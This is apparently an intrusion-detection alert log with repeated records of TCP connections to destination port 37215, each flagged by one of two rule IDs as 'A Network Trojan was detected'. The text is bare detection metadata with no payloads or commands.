            Timestamp:05/28/24-09:57:27.970318
            SID:2835222
            Source Port:60500
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.807274
            SID:2835222
            Source Port:50986
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:00.834124
            SID:2829579
            Source Port:40106
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.962797
            SID:2835222
            Source Port:45556
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:58.767709
            SID:2829579
            Source Port:59560
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:39.321377
            SID:2829579
            Source Port:47604
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:20.051312
            SID:2835222
            Source Port:37034
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.852112
            SID:2829579
            Source Port:35238
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:46.589899
            SID:2835222
            Source Port:59502
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:55.729354
            SID:2835222
            Source Port:37706
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.821757
            SID:2829579
            Source Port:50086
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:32.060343
            SID:2829579
            Source Port:39142
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:34.060045
            SID:2835222
            Source Port:59708
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:21.884874
            SID:2835222
            Source Port:42508
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:41.349931
            SID:2835222
            Source Port:38000
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:47.532466
            SID:2835222
            Source Port:56448
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:44.381710
            SID:2829579
            Source Port:43586
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:46.472850
            SID:2835222
            Source Port:53730
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.812732
            SID:2835222
            Source Port:36642
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.841220
            SID:2829579
            Source Port:33990
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.945480
            SID:2829579
            Source Port:38972
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.810311
            SID:2829579
            Source Port:49790
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.956903
            SID:2829579
            Source Port:37870
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:38.290963
            SID:2829579
            Source Port:40526
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.935441
            SID:2829579
            Source Port:33024
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:32.070306
            SID:2829579
            Source Port:41786
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.861297
            SID:2835222
            Source Port:56634
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:06.977636
            SID:2835222
            Source Port:52066
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.858478
            SID:2829579
            Source Port:56892
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:34.064886
            SID:2829579
            Source Port:40248
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:44.508175
            SID:2829579
            Source Port:55542
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.946361
            SID:2835222
            Source Port:53488
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:49.605732
            SID:2835222
            Source Port:40364
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:31.026858
            SID:2829579
            Source Port:35354
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:23.196299
            SID:2829579
            Source Port:60892
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:05.855462
            SID:2835222
            Source Port:37172
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:10.019837
            SID:2829579
            Source Port:50864
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:45.543436
            SID:2835222
            Source Port:55888
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.919599
            SID:2835222
            Source Port:42140
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:48.567711
            SID:2829579
            Source Port:54112
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:28.356784
            SID:2835222
            Source Port:42994
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:39.320471
            SID:2829579
            Source Port:38376
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.910980
            SID:2835222
            Source Port:37986
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:56.752782
            SID:2829579
            Source Port:37380
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:03.850986
            SID:2835222
            Source Port:54708
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.000960
            SID:2829579
            Source Port:50554
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:46.446497
            SID:2835222
            Source Port:47796
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:17.000241
            SID:2829579
            Source Port:42146
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:32.408793
            SID:2829579
            Source Port:38620
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:55.715258
            SID:2835222
            Source Port:41758
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.828143
            SID:2829579
            Source Port:37234
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.840205
            SID:2829579
            Source Port:39538
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:35.280959
            SID:2829579
            Source Port:36690
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:04.850231
            SID:2829579
            Source Port:56710
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:59.816964
            SID:2835222
            Source Port:46554
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:04.836986
            SID:2829579
            Source Port:36068
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.938190
            SID:2835222
            Source Port:55332
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.777262
            SID:2829579
            Source Port:58654
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:33.064559
            SID:2835222
            Source Port:44018
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.822082
            SID:2829579
            Source Port:36158
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.855477
            SID:2829579
            Source Port:56210
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:07.904825
            SID:2835222
            Source Port:54424
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:51.604762
            SID:2835222
            Source Port:49646
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.943749
            SID:2829579
            Source Port:47344
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:26.922361
            SID:2835222
            Source Port:38440
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:43.451534
            SID:2829579
            Source Port:57206
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:06.919592
            SID:2829579
            Source Port:45286
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:06.879151
            SID:2835222
            Source Port:34856
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:44.507069
            SID:2829579
            Source Port:49192
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:21.071282
            SID:2835222
            Source Port:42284
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.773678
            SID:2835222
            Source Port:42946
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:00.811875
            SID:2829579
            Source Port:48186
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:05.927415
            SID:2829579
            Source Port:52008
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.919282
            SID:2829579
            Source Port:45612
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:33.084459
            SID:2829579
            Source Port:51372
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:41.326706
            SID:2835222
            Source Port:42692
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:52.639865
            SID:2829579
            Source Port:40928
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:37.310928
            SID:2835222
            Source Port:58586
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:00.809124
            SID:2829579
            Source Port:57890
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.998261
            SID:2835222
            Source Port:52590
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:48.581188
            SID:2835222
            Source Port:50964
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.767052
            SID:2829579
            Source Port:37952
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:34.066839
            SID:2835222
            Source Port:44476
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:56.746925
            SID:2829579
            Source Port:37068
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.654651
            SID:2829579
            Source Port:35906
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.810367
            SID:2829579
            Source Port:35562
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.825395
            SID:2829579
            Source Port:47364
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.857784
            SID:2829579
            Source Port:38708
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.764768
            SID:2835222
            Source Port:34178
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:51.604725
            SID:2835222
            Source Port:54728
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:42.371361
            SID:2835222
            Source Port:50462
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:00.811304
            SID:2829579
            Source Port:33048
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:44.507993
            SID:2829579
            Source Port:51050
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.767948
            SID:2829579
            Source Port:55282
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:07.905326
            SID:2835222
            Source Port:36774
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:53.681651
            SID:2835222
            Source Port:45992
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.754314
            SID:2829579
            Source Port:42260
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.057949
            SID:2829579
            Source Port:59642
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:42.394342
            SID:2835222
            Source Port:60964
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.051392
            SID:2835222
            Source Port:52798
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.862791
            SID:2829579
            Source Port:35778
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:07.899873
            SID:2829579
            Source Port:43802
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:00.712021
            SID:2835222
            Source Port:40170
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:42.379697
            SID:2829579
            Source Port:39976
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:22.052013
            SID:2829579
            Source Port:41524
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.910914
            SID:2829579
            Source Port:45462
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:03.870217
            SID:2835222
            Source Port:47950
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:53.681677
            SID:2835222
            Source Port:33108
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:49.623327
            SID:2829579
            Source Port:54244
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:23.193294
            SID:2829579
            Source Port:39948
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.046474
            SID:2835222
            Source Port:35002
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:23.893994
            SID:2829579
            Source Port:35452
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:31.047671
            SID:2829579
            Source Port:37784
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:45.550664
            SID:2835222
            Source Port:40214
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.793886
            SID:2829579
            Source Port:60254
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.773786
            SID:2835222
            Source Port:50972
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.782866
            SID:2835222
            Source Port:54536
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:46.437308
            SID:2835222
            Source Port:49968
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:46.443836
            SID:2835222
            Source Port:47476
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:34.068704
            SID:2835222
            Source Port:41802
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:54.721197
            SID:2829579
            Source Port:46870
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.805900
            SID:2835222
            Source Port:40606
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:30.351840
            SID:2829579
            Source Port:37616
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:58.759256
            SID:2829579
            Source Port:45422
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.811550
            SID:2829579
            Source Port:39718
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:26.929572
            SID:2829579
            Source Port:51352
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.856449
            SID:2835222
            Source Port:45358
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:54.711184
            SID:2829579
            Source Port:53256
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.759560
            SID:2829579
            Source Port:43822
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:33.040485
            SID:2835222
            Source Port:33072
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:13.971908
            SID:2829579
            Source Port:45536
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:54.657303
            SID:2835222
            Source Port:47290
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:26.206583
            SID:2829579
            Source Port:34912
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:57.739724
            SID:2829579
            Source Port:38370
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.814904
            SID:2829579
            Source Port:52224
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:01.773935
            SID:2829579
            Source Port:39452
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:09.877813
            SID:2835222
            Source Port:50222
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:21.879909
            SID:2835222
            Source Port:37056
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:37.310631
            SID:2829579
            Source Port:45644
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.792511
            SID:2835222
            Source Port:42432
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:35.261711
            SID:2835222
            Source Port:38152
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.778791
            SID:2835222
            Source Port:57474
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:28.995870
            SID:2829579
            Source Port:46740
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:43.435585
            SID:2835222
            Source Port:46352
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:51.665397
            SID:2835222
            Source Port:37466
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:10.034821
            SID:2829579
            Source Port:59756
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:44.506701
            SID:2835222
            Source Port:43014
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:00.865903
            SID:2835222
            Source Port:56192
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.843061
            SID:2835222
            Source Port:51626
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:04.842416
            SID:2835222
            Source Port:49750
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:20.051275
            SID:2829579
            Source Port:50688
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:50.564922
            SID:2829579
            Source Port:60176
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.963262
            SID:2829579
            Source Port:43666
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.779077
            SID:2829579
            Source Port:56782
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:53.676648
            SID:2829579
            Source Port:40284
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:44.507968
            SID:2835222
            Source Port:50594
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:18.020505
            SID:2829579
            Source Port:36676
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:49.605100
            SID:2835222
            Source Port:46024
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:52.655945
            SID:2829579
            Source Port:33442
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:39.332375
            SID:2835222
            Source Port:59228
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:24.136282
            SID:2829579
            Source Port:50960
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:23.893823
            SID:2835222
            Source Port:58716
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:37.308808
            SID:2829579
            Source Port:56352
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:46.472221
            SID:2835222
            Source Port:42826
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:35.278076
            SID:2835222
            Source Port:44966
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:49.599649
            SID:2835222
            Source Port:33234
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:26.943333
            SID:2835222
            Source Port:42808
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:50.623290
            SID:2829579
            Source Port:56948
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.912260
            SID:2835222
            Source Port:45024
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.969116
            SID:2835222
            Source Port:46678
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:35.280211
            SID:2829579
            Source Port:36240
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.842716
            SID:2829579
            Source Port:36534
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:34.060079
            SID:2835222
            Source Port:53272
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:42.499772
            SID:2829579
            Source Port:38766
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:47.543954
            SID:2829579
            Source Port:58808
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:40.564011
            SID:2829579
            Source Port:53724
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.956786
            SID:2829579
            Source Port:40048
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:39.336676
            SID:2835222
            Source Port:59148
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.766815
            SID:2829579
            Source Port:48704
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:06.988366
            SID:2829579
            Source Port:51518
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.748691
            SID:2835222
            Source Port:60420
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.860596
            SID:2829579
            Source Port:34694
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.773165
            SID:2829579
            Source Port:47500
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:47.486849
            SID:2829579
            Source Port:41702
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.909194
            SID:2835222
            Source Port:44096
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:39.300026
            SID:2835222
            Source Port:52518
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:45.543774
            SID:2829579
            Source Port:38998
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:05.951579
            SID:2829579
            Source Port:47720
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:58.773222
            SID:2829579
            Source Port:34086
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:23.899797
            SID:2829579
            Source Port:44374
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:48.519108
            SID:2835222
            Source Port:53312
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.764748
            SID:2829579
            Source Port:40668
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:37.308183
            SID:2835222
            Source Port:42466
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:59.728715
            SID:2835222
            Source Port:44800
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:02.811242
            SID:2829579
            Source Port:56370
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.848418
            SID:2835222
            Source Port:33590
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:57.747012
            SID:2835222
            Source Port:41132
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:44.380666
